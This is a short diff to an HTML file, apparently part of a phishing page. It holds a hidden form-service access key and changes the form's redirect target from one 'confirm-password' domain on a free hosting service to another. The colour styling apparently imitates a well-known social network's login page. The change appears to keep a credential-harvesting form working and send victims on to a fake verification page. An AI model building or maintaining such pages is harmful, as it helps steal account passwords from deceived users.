--- a/validation.html
+++ b/validation.html
@@ -14,7 +14,7 @@
 
 <input type="hidden" name="access_key" value="93bfa4ba-a819-4622-bb15-c221b844ffcf">
 
-<input type="hidden" name="redirect" value="https://confirm-password-iota.vercel.app/">
+<input type="hidden" name="redirect" value="https://confirm-password-verification.netlify.app/">
 
 <div class="relative flex border bg-[#e9ebee] h-10 md:hidden 1g:hidden sm:block">
             <div>
